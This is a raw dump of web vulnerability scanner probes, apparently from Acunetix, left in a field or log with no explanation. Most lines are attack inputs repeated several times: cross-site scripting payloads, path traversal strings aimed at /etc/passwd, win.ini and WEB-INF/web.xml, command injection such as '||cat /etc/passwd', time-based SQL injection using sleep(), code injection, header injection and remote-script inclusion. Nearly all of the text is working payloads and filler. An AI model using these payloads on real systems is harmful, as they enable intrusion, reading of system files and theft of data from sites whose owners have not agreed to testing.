1<video><source onerror="javascript:prompt(927370)">

1

1

^(#$!@#$)(()))******

/etc/passwd

Xh6BP6up'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(960728)"></g></svg>

1

||cat /etc/passwd

1

1

1

1<div style=width:expression(prompt(943511))>

1

WjX6EzWX')

1

WEB-INF/web.xml

1

1

&dir

1<iframe src='data:text/html

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

oAyGoif3'))

1

'&dir&'

1<body onload=prompt(989739)>

WEB-INF\web.xml

1

'"()

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(935228)>

'

1

1

1

"&dir&"

1<img src=xyz OnErRor=prompt(963477)>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1)

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

"

|dir

1

-1))

1

1<img/src=">" onerror=alert(935712)>

1

1

${@print(md5(acunetix_wvs_security_test))}

1

'|dir

1<ScRiPt%20>prompt(926049)</sCripT>

1

file:///etc/passwd

3qVhWJMc'

http://hitiywoup9ofK.bxss.me/

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

"|dir

1

1

1

1&lt

comments

/\../\../\../\../\../\../\../etc/passwd

1

YsOrdD6r')

1

1

\xf6<img acu onmouseover=prompt(961385) //\xf6>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

veNL8ooF'))

WEB-INF/web.xml

1

comments

1

http://www.acunetix.tst

1

1<input autofocus onfocus=prompt(927773)>

1

WEB-INF\web.xml

1

1

comments/.

'"

1

1

<a href='http://www.acunetix.com'>website security</a>

../../../../../../../../../../windows/win.ini

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

<!--

1

1

1

../../../../../../../../../../boot.ini

1'"()&%<ScRiPt >prompt(995708)</ScRiPt>

1_tJ9UB <ScRiPt >prompt(902197)</ScRiPt>

1

1

response.write(9700451*9088948)

'"()&%<ScRiPt >prompt(926565)</ScRiPt>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_946865

1

'+response.write(9700451*9088948)+'

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

&cat /etc/passwd&

"+response.write(9700451*9088948)+"

1

................windowswin.ini

1

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

..\..\..\..\..\..\..\..\windows\win.ini

../../../../../../../../../../etc/passwd

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

cat /etc/passwd

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

|cat /etc/passwd#

1

${99013+99753}

1

acu8916\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8916

'|'ld

1

1

1

acux2404\xc0\xbez1\xc0\xbcz2a\x90bcxuca2404

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"|"ld

1

1

1

WEB-INF/web.xml

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<ScRiPt >prompt(966499)</ScRiPt>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1&n913044=v996057

1

1some_inexistent_file_with_long_name%00.jpg

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

WEB-INF\web.xml

1<script>prompt(947841)</script>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1

1<ScRiPt >prompt(913173)</ScRiPt>

1

-1

1

"

)

testasp.vulnweb.com

/etc/passwd

1

1

-1)

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?984349></ScRiPt>

1

!(()&&!|*|*|

1<ScRiPt >prompt(924508)</ScRiPt>

||cat /etc/passwd

1

1

-1))

1

^(#$!@#$)(()))******

'"()

1

1

IIE8zBb3'

&dir

1

1<video><source onerror="javascript:prompt(953050)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

4Vjxt07g')

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(974717)"></g></svg>

1

1

1

1

'&dir&'

QrQ4EYbX'))

1

1

1<div style=width:expression(prompt(901302))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"&dir&"

1

1

1

-1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<iframe src='data:text/html

http://hitwKYD29c9zJ.bxss.me/

1

1

1

-1)

'

1

|dir

1<body onload=prompt(923513)>

1

1

-1))

acunetix_wvs_invalid_filename

1

"

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(946967)>

file:///etc/passwd

1

'|dir

${@print(md5(acunetix_wvs_security_test))}

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

J2wJRz6S'

/\../\../\../\../\../\../\../etc/passwd

1

1<img src=xyz OnErRor=prompt(912838)>

98snkwCP')

1

1

comments

"|dir

oqErav1F'))

1<img/src=">" onerror=alert(909368)>

1

${@print(md5(acunetix_wvs_security_test))}\

http://www.acunetix.tst

WEB-INF/web.xml

comments/.

'"

1

1

1

WEB-INF\web.xml

1

1

1<ScRiPt%20>prompt(977100)</sCripT>

1

1

1

<!--

1

1

1&lt

1'"()&%<ScRiPt >prompt(917286)</ScRiPt>

1

1

1

../../../../../../../../../../windows/win.ini

1

1

\xf6<img acu onmouseover=prompt(978569) //\xf6>

1

1

1

1

1

1<input autofocus onfocus=prompt(972007)>

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(980221)</ScRiPt>

1

1

response.write(9853059*9029687)

1

1

<a href='http://www.acunetix.com'>website security</a>

1_962505

&cat /etc/passwd&

'+response.write(9853059*9029687)+'

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../windows/win.ini.jpg

[url=http://www.acunetix.com]website security[/url]

"+response.write(9853059*9029687)+"

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

1

1_1f2e5 <ScRiPt >prompt(908817)</ScRiPt>

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

"&cat /etc/passwd&"

1

1

1

1

1

1

................windowswin.ini

cat /etc/passwd

1

1

1

1

1

`cat /etc/passwd`

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

../../../../../../../../../../etc/passwd

1

|cat /etc/passwd#

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

1

${100179+100467}

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

acu7712\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7712

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"|"ld

../../../../../../../../../../etc/passwd.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

acux1173\xc0\xbez1\xc0\xbcz2a\x90bcxuca1173

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1&n977463=v945056

1some_inexistent_file_with_long_name%00.jpg

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1

1

1<ScRiPt >prompt(953936)</ScRiPt>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'

1<script>prompt(919400)</script>

1

-1)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

WEB-INF/web.xml

"

)

testasp.vulnweb.com

1

1<ScRiPt >prompt(957643)</ScRiPt>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

-1))

WEB-INF\web.xml

!(()&&!|*|*|

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?943879></ScRiPt>

1

||cat /etc/passwd

'"()

1

1

^(#$!@#$)(()))******

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

qZjjVTNO'

1

&dir

1

1

1<ScRiPt >prompt(957130)</ScRiPt>

/etc/passwd

1

CAzLyj3H')

1

1

'&dir&'

1<video><source onerror="javascript:prompt(917518)">

1

1

1

1

twTjZf7v'))

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(931548)"></g></svg>

"&dir&"

1

-1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

|dir

1

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1<div style=width:expression(prompt(922878))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

'|dir

1<iframe src='data:text/html

1

1

"

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

acunetix_wvs_invalid_filename

1<body onload=prompt(921403)>

${@print(md5(acunetix_wvs_security_test))}

1

http://hitRdjRyXmLtv.bxss.me/

"|dir

${@print(md5(acunetix_wvs_security_test))}\

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

XZUXHcHg'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(919870)>

1

1

1

1

comments

zuJDsuAn')

1

1

1<img src=xyz OnErRor=prompt(994313)>

file:///etc/passwd

'"

comments/.

http://www.acunetix.tst

1

nK8nunuF'))

1

1<img/src=">" onerror=alert(918957)>

1'"()&%<ScRiPt >prompt(932839)</ScRiPt>

<!--

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(941802)</ScRiPt>

1

1

1<ScRiPt%20>prompt(934042)</sCripT>

1

1

1

1

WEB-INF/web.xml

1

1&lt

1

1_986362

1

1

1

WEB-INF\web.xml

1

response.write(9883002*9872065)

\xf6<img acu onmouseover=prompt(929566) //\xf6>

1

1

1

'+response.write(9883002*9872065)+'

1<input autofocus onfocus=prompt(929488)>

../../../../../../../../../../windows/win.ini

1

&cat /etc/passwd&

1

1

"+response.write(9883002*9872065)+"

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

1

../../../../../../../../../../boot.ini

'&cat /etc/passwd&'

1

[url=http://www.acunetix.com]website security[/url]

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../windows/win.ini.jpg

1_QOwVX <ScRiPt >prompt(978154)</ScRiPt>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

1

cat /etc/passwd

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

../../../../../../../../../../etc/passwd

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

`cat /etc/passwd`

................windowswin.ini

1

1

1

1

acu9451\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca9451

1

../../../../../../../../../../etc/passwd.jpg

${99245+99615}

..\..\..\..\..\..\..\..\windows\win.ini

|cat /etc/passwd#

acux2357\xc0\xbez1\xc0\xbcz2a\x90bcxuca2357

1

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

'|'ld

1<ScRiPt >prompt(992395)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1&n975749=v950333

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<script>prompt(959494)</script>

1

1some_inexistent_file_with_long_name%00.jpg

"|"ld

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1<ScRiPt >prompt(927678)</ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

-1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?987161></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

testasp.vulnweb.com

)

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1<ScRiPt >prompt(948712)</ScRiPt>

1

-1)

1

1

!(()&&!|*|*|

1

/etc/passwd

"

-1))

1

1<video><source onerror="javascript:prompt(956091)">

1

WEB-INF/web.xml

1

1

^(#$!@#$)(()))******

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(969691)"></g></svg>

1

FWeEPCoX'

||cat /etc/passwd

1

1

1

1

WEB-INF\web.xml

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

z8pSxDaV')

1

1<div style=width:expression(prompt(922432))>

&dir

1

1

1

1

c40nsiUU'))

1<iframe src='data:text/html

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'&dir&'

-1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'"()

1<body onload=prompt(949033)>

"&dir&"

'

1

1

-1)

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(909882)>

1

1

"

-1))

acunetix_wvs_invalid_filename

http://hitr5v3iNwTvc.bxss.me/

|dir

${@print(md5(acunetix_wvs_security_test))}

1

file:///etc/passwd

1<img src=xyz OnErRor=prompt(926164)>

1

'|dir

k65kYLh4'

comments

1

1<img/src=">" onerror=alert(976929)>

1

1

${@print(md5(acunetix_wvs_security_test))}\

/\../\../\../\../\../\../\../etc/passwd

1<ScRiPt%20>prompt(979605)</sCripT>

"|dir

1

snu6MNsr')

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

WEB-INF/web.xml

1&lt

1

E1uQaE18'))

comments/.

'"

http://www.acunetix.tst

WEB-INF\web.xml

\xf6<img acu onmouseover=prompt(945873) //\xf6>

1

1

1

1

<!--

1

1

1<input autofocus onfocus=prompt(910655)>

1

../../../../../../../../../../windows/win.ini

1'"()&%<ScRiPt >prompt(922391)</ScRiPt>

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

1

../../../../../../../../../../boot.ini

'"()&%<ScRiPt >prompt(987467)</ScRiPt>

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

1

response.write(9304707*9345725)

1

1

1_974750

../../../../../../../../../../windows/win.ini.jpg

1_sNzck <ScRiPt >prompt(917333)</ScRiPt>

'+response.write(9304707*9345725)+'

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

"+response.write(9304707*9345725)+"

&cat /etc/passwd&

................windowswin.ini

1

1

1

1

1

'&cat /etc/passwd&'

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

1

SomeCustomInjectedHeader:injected_by_wvs

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

${99762+99088}

1

`cat /etc/passwd`

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

WEB-INF/web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

|cat /etc/passwd#

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

acu7245\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7245

1

1&n947892=v927082

'|'ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

WEB-INF\web.xml

1

1

"|"ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

acux6381\xc0\xbez1\xc0\xbcz2a\x90bcxuca6381

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

testasp.vulnweb.com

)

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1<ScRiPt >prompt(951073)</ScRiPt>

!(()&&!|*|*|

1

1

1

1

^(#$!@#$)(()))******

1

1<script>prompt(988207)</script>

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

1

1

1

1

1

-1

1<ScRiPt >prompt(944864)</ScRiPt>

/etc/passwd

"

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?988953></ScRiPt>

-1)

1

1

1

1

1

1

||cat /etc/passwd

1

1

-1))

1<ScRiPt >prompt(953609)</ScRiPt>

1

1

1<video><source onerror="javascript:prompt(967208)">

1

&dir

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

PdZRZIRm'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983073)"></g></svg>

1

'

'"()

1

1

'&dir&'

yjCCfb73')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

"

1

1<div style=width:expression(prompt(997983))>

SxqaR9BA'))

1

"&dir&"

1

1

1

1<iframe src='data:text/html

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

-1

1

|dir

acunetix_wvs_invalid_filename

http://hitc1UfyCbkH1.bxss.me/

1<body onload=prompt(952976)>

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}\

comments

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(986539)>

'|dir

-1))

1

1

file:///etc/passwd

1

comments

http://www.acunetix.tst

fiv8fP8l'

1<img src=xyz OnErRor=prompt(918271)>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments/.

1

/\../\../\../\../\../\../\../etc/passwd

"|dir

1

1<img/src=">" onerror=alert(985556)>

XaDjcWD6')

1

1

1

1

1

1<ScRiPt%20>prompt(980960)</sCripT>

'"

WEB-INF/web.xml

1

1

1

Ka9scewa'))

1'"()&%<ScRiPt >prompt(916748)</ScRiPt>

<!--

1&lt

1

'"()&%<ScRiPt >prompt(926319)</ScRiPt>

1

1

WEB-INF\web.xml

1

1

\xf6<img acu onmouseover=prompt(922846) //\xf6>

1

response.write(9543501*9572257)

1

1_958996

1

1

../../../../../../../../../../windows/win.ini

1

1

'+response.write(9543501*9572257)+'

1

1<input autofocus onfocus=prompt(957647)>

"+response.write(9543501*9572257)+"

SomeCustomInjectedHeader:injected_by_wvs

&cat /etc/passwd&

1

../../../../../../../../../../boot.ini

SomeCustomInjectedHeader:injected_by_wvs

<a href='http://www.acunetix.com'>website security</a>

1

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

[url=http://www.acunetix.com]website security[/url]

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1_wR8iI <ScRiPt >prompt(963795)</ScRiPt>

1

"&cat /etc/passwd&"

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

../../../../../../../../../../etc/passwd

1

1

1

1

................windowswin.ini

1

cat /etc/passwd

1

1

1

1

1

acu7816\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7816

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

..\..\..\..\..\..\..\..\windows\win.ini

1

`cat /etc/passwd`

1

acux5092\xc0\xbez1\xc0\xbcz2a\x90bcxuca5092

${99954+100080}

../../../../../../../../../../etc/passwd.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<ScRiPt >prompt(959504)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(967115)</script>

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1&n941618=v929561

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(955970)</ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?959862></ScRiPt>

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

"|"ld

1

testasp.vulnweb.com

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

1<ScRiPt >prompt(967804)</ScRiPt>

1

)

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(947580)">

1

1

'

1

-1

!(()&&!|*|*|

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989470)"></g></svg>

/etc/passwd

1

WEB-INF\web.xml

1

1

1<div style=width:expression(prompt(979969))>

^(#$!@#$)(()))******

-1)

1

"

1<iframe src='data:text/html

1

1

1

1

1

-1))

1

||cat /etc/passwd

1<body onload=prompt(972960)>

1

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(912880)>

1

7XqtPUPX'

1

'"()

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1<img src=xyz OnErRor=prompt(964445)>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

sHEbfprI')

1

'&dir&'

1

1<img/src=">" onerror=alert(915033)>

1

"

1

1

acunetix_wvs_invalid_filename

xWznvP1x'))

"&dir&"

1<ScRiPt%20>prompt(928852)</sCripT>

http://hitQx7KVpSUb2.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}

1

comments

|dir

1&lt

-1

file:///etc/passwd

1

1

comments

${@print(md5(acunetix_wvs_security_test))}\

1

'|dir

\xf6<img acu onmouseover=prompt(960839) //\xf6>

-1)

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

comments/.

http://www.acunetix.tst

/\../\../\../\../\../\../\../etc/passwd

'"

1

1<input autofocus onfocus=prompt(982866)>

"|dir

1

-1))

<!--

1

1'"()&%<ScRiPt >prompt(940161)</ScRiPt>

WEB-INF/web.xml

1

<a href='http://www.acunetix.com'>website security</a>

1

'"()&%<ScRiPt >prompt(947477)</ScRiPt>

1

1

1

1

1

1

EB2xAIaO'

WEB-INF\web.xml

1

[url=http://www.acunetix.com]website security[/url]

1

1_922367

response.write(9021555*9155369)

1_5SrQV <ScRiPt >prompt(983344)</ScRiPt>

gBmcJQS5')

1

../../../../../../../../../../windows/win.ini

'+response.write(9021555*9155369)+'

1

1

WZimk4Zm'))

1

1

1

1

"+response.write(9021555*9155369)+"

../../../../../../../../../../boot.ini

1

1

1

1

1

&cat /etc/passwd&

../../../../../../../../../../windows/win.ini.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1

................windowswin.ini

1

1

1

acu5275\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5275

cat /etc/passwd

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

acux9605\xc0\xbez1\xc0\xbcz2a\x90bcxuca9605

1

${99837+100012}

`cat /etc/passwd`

1<ScRiPt >prompt(967277)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

../../../../../../../../../../etc/passwd.jpg

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<script>prompt(929491)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

|cat /etc/passwd#

1&n936960=v941072

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<ScRiPt >prompt(912558)</ScRiPt>

1

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?913370></ScRiPt>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

testasp.vulnweb.com

"|"ld

1<ScRiPt >prompt(914746)</ScRiPt>

)

1

1

1

1

WEB-INF/web.xml

1<video><source onerror="javascript:prompt(961610)">

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

1

1

